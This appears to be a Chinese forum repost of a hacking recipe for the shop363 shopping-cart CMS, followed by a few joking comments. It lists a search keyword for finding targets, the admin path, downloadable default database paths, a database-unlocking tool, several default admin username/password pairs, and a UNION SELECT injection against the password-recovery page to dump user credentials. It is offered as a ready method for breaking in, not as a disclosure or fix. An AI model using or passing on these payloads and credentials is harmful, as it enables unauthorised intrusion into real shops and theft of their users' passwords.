咋说呢,你让我咋说呢。
这个程序安全不是很好,不过其中的一个replace()函数写的很好,不过没有找到是怎么写的,将注射中的“空格、select、%20、+号、还有/**/等过滤为空。在搜索出存在漏洞语句很麻烦 ,我也不写了,直接来个釜底抽薪的方法,直接拿密码账号很快的。
关键字:技术支持:shop363.net
后台地址:/admin_shop363/
数据库:Data_Shop363/Date_Shop363_shop.mdb
数据库解密工具:AccessUnLock.exe
破解出账号:admin 密码:actionshop363?
备用数据库:
Data_Shop363/Date_Shop363_shop.mdb默认数据库
bbs/data/#sjyshop363.mdb论坛数据库
首页取回密码处注射漏洞(对拿Shell没有多大用,不过能爆出一些用户名密码)直接访问
‘union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from shop363_user
显示为7
依次换为username password
也可以使用后台默认密码:action first
第二组:admin admin888
第三组:admin admin(90%能直接进入后台)
fr0m:China Abin
==============================================
Ps:是他逼我转的,我是被逼的
{smile:2}~~~~~~~~~~~甯
@Visper:我不知道!{smile:23}
php的mysql_real_escape_string()函数安全不?
@旅行士吧:笑神马!{smile:40}
呵呵,{smile:49}